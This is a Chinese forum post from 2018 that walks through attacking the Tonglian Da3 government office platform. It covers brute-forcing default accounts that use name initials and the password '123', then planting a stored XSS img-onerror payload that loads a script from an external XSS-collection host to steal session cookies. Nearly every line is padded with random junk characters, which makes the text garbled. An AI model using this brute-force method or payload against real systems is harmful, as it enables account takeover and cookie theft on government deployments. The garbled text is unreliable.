& ^( p t+ }( P* ~3 Y
) K2 L+ s4 k" f- B: Z 同联Da3协同办公平台后台通用储存型xss漏洞
- |+ k0 d% h* m( Z
4 T7 Z: H+ q& t/ ?( @
) C5 ]) g0 r7 Q) i' U 平台简介:. g$ e" c2 a6 F, j! o4 Q& S4 D
2 d3 ^: H2 Z" K; o Q# U# `# k
5 U! E# u& ~" m) W/ }. {5 b 8 T; @/ w. v/ }" |. f1 V! `2 z
4 h, d) Q. E+ d
6 c* i3 n$ s& X7 ] 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 t+ R8 m$ m/ {# V: D8 H; I
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: @4 l3 r+ Q6 Y
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
+ t V. `! J7 b: U
2 b+ W7 q( i8 a% g+ f % |* B3 u o2 f" W8 z6 k
/ W: @. r/ m, H+ C5 b" I( y! P, ]
! z3 T' P q% u& q. t% s 8 i! x# }' N( b7 _1 {6 p
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
f6 v2 I- U. L! V$ ?# e
& _6 I6 i+ }8 {0 J/ [4 D
! H: n# }1 k4 f; H0 @6 H . i3 T. }0 o1 K/ [, P$ }" Y
. O. Z# `6 _) }) s9 a: `& [) L. p8 ?
! g$ C6 K! b4 q; b& A http://1.1.1.1:7197/cap-aco/#(案例2-)
% |4 x/ }1 h2 b
, m6 M6 Y/ y6 T: W" s& o2 w2 K
4 a, p% H6 m' V2 a7 e, I/ R http://www.XXOO.com (案例1-官网网站)/ q4 W8 t, Z6 [4 C+ I
& ^2 V" Y" ?& B! F
1 |4 I4 R, Z# m" D3 C8 T; E 漏洞详情:
6 `" ~' g, K' ~6 C# @
2 S; ^) ~/ d+ T" t+ v# Q - H% f; V* g/ p) |9 m
案例一、( A! l5 K1 K# I7 o
3 M( g' Y* d k! D9 s
: d* U) \5 Q1 p' ] 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
! ?5 Y; C O+ ]3 T+ Z& F
* h/ D5 @8 m6 l' m& M/ U 9 |4 n3 R, Y7 t6 u! x: M
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
/ B5 H4 _9 Z. M, n2 E3 p0 ]8 K0 u
& C. p" z& B& x1 c4 m# ?& @8 O
( F$ m- E! ~& r& P# V3 X$ t, y% [8 w; n. x
, l3 a( c2 n$ U2 ~- ~
* y# ?& p: T2 f% q5 j& \4 B
* o" f& U; S6 \1 P7 {+ V 
2 _5 G" o) V% ?" h. |& r
- h4 p( D$ y$ w
: C+ b! b& Z2 r
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: : U/ A0 ]" Q( ?
2 x: C' d/ [3 {/ {2 } T) n
+ y: ~4 w2 F. A. {3 q4 W7 T
' ^' s1 P; y$ T3 s0 _% n4 ?
) `; E! h, p( ?" X
9 V# H! ?) F1 C
( U+ s& a, ? z0 X5 U/ a% f
- b5 A2 g3 m u' X4 p / p0 y8 O; T, G2 J( _# @
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 , l# d3 o' A4 i
1 ^- D N0 `6 b+ u+ u
! M6 E8 e7 \+ _6 Z5 y7 W
7 |& J6 ^, U/ T8 d) }/ E- \
% m% ]7 z+ t, D
6 m* @0 n) ~1 x( D+ u; K' i3 E* l <img src=x! I5 J6 K# K4 B; [+ I- `
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 8 Y0 `) y& o; O! X6 O
. C- c3 Q! o" ~7 ?& q
) B. A$ R, a: F) ]) ~5 s1 P
$ O# ?5 _- x) W; v5 O# f$ h& g
. z; K* L9 Z7 L2 ?% \
9 I' \1 ~8 o0 r% ?6 {6 _% F# D J+ a
然后发送,接收cookie如图: * S* J( ^! r/ _+ ^6 B. [5 D8 M
2 Q/ n& A" u' ?3 ^% ~( ^% P. G9 K2 s 0 i2 p. t! U4 s
; y8 B) b1 Z5 r* v
% I3 @5 l0 p; t5 J- o' o. M$ E/ M
2 U+ S% l5 ^& v' \: J) a4 ]4 C: F
# ?4 {6 E+ \2 R6 \% T* R
# p; g5 K8 i" \9 ]+ m) ?8 E0 S
9 d0 h8 |0 {8 q3 j( W
) h2 Q+ E2 ]: e# [. k' V
2 w2 b* ^4 f. j [9 _5 ?2 I+ P
+ r$ z, h- I2 |2 F9 j: `
5 d7 ]" T0 Z4 d& E+ i3 N
; v( Q8 Z6 C* P6 S
; W6 l& v/ D2 m4 Y) t 
2 S8 G6 Y8 u @* ]- w& n% q/ d. G
$ B: M" ]& F" {8 t1 s( C
' j, N$ f+ n# h4 M, @ 
; x$ C) L8 |$ @* H5 n
; A: j. b% T. w9 b* A& M
9 K9 L+ [ N2 \2 k' |* c
! P/ T! a6 o: u5 H" P* k$ F1 }
7 n& v! l& M. [ * f: D7 c- o. B5 d
案例2、
Z4 V8 T- X" q. L
# O6 j% ~- I6 ~) C: N6 D0 t
5 v! X9 u% V3 Q3 `9 V2 B9 [ 前面步骤都一样,下面看效果图:
& [& ~/ {/ h9 I$ H6 R$ c% Q( K! y
' `$ O! u/ z c / P3 z! G# M1 S& I! X; z
6 M9 |7 t; G9 D* v
4 w( n& T' l k) U( y- U
( n3 \& o' s# C M0 t5 Y 
8 C: @, `/ t" u/ R/ V9 d
' C: R3 a8 R2 Q9 {4 g* `- l0 B: z
& X# ?0 |, H# h- e
7 M, x4 J( @* W1 K9 h1 M) A
8 H# e0 D8 T9 y. p9 ^! ] 0 I: d) k" @0 O4 n# M9 ^, p
" D) ]4 H7 r0 e$ ? Q8 O R# S
$ M, X* Z) J2 u8 U' t
. |3 b" P$ l, Z6 D# T' y% V: r 
8 Q1 `# l) V4 `0 d
R! O2 x3 P" I4 W# F3 G0 ~
( n+ C/ I" v0 \, y
& t$ l5 R% n' \- P* d
* V9 i" P0 M4 z% }% S4 R
$ g! ^0 k J: C/ f
$ L5 [$ {3 C) D* `
# ^4 A+ I: o5 L. }
$ F2 t5 w! V W6 `- N
! w# E5 |0 R' \& s5 E
4 k6 r4 z/ F3 R S+ N9 U - g' H* L* m0 E$ j3 F
5 x) L' M; s, J; _% ?
# C4 g$ E, S' w& C/ t% E
发表于 2018-10-20 20:14:15
收藏
支持
反对